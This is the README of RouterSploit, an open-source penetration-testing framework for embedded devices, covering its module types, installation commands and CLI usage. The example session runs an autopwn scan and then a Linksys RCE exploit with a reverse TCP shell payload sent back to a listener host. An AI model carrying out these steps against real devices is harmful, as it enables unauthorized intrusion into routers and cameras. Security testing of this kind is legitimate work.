Join community on Embedded Exploitation Discord.
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if a target is vulnerable to any exploit
- payloads - modules that are responsible for generating payloads for various architectures and injection points
- generic - modules that perform generic attacks
Required:
- requests
- paramiko
- pysnmp
- pycrypto
Optional:
- bluepy - Bluetooth low energy
apt update && apt install routersploit
or
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker compose up --build -d
docker attach routersploit
docker start routersploit
docker attach routersploit
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull
RouterSploit CLI:
rsf> show all
rsf> search cisco rsf> search type=exploits rsf> search device=cameras
rsf> use module_name
rsf> show options
rsf> set option_name
csf> run
Example: rsf > use scanners/autopwn rsf (AutoPwn) > rsf (AutoPwn) > set target 192.168.0.1 [+] target => 192.168.0.1 rsf (AutoPwn) > show options rsf (AutoPwn) > run
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > show options rsf (Linksys E-Series TheMoon RCE) > set target 192.168.0.1 rsf (Linksys E-Series TheMoon RCE) > run cmd> show payloads cmd > set payload mipsle/reverse_tcp cmd (MIPSLE Reverse TCP) > set lhost 192.168.0.30 lhost => 192.168.0.30 cmd (MIPSLE Reverse TCP) > run
To our surprise, people started to fork routersploit not because they were interested in the security of embedded devices but simply because they want to leverage our interactive shell logic and build their tools using similar concept. All these years they must have said: "There must be a better way!" and they were completely right, the better way is called Riposte.
Riposte allows you to easily wrap your application inside a tailored interactive shell. Common chores regarding building REPLs was factored out and being taken care of so you can focus on specific domain logic of your application.
The RouterSploit Framework is under a BSD license. Please see LICENSE for more details.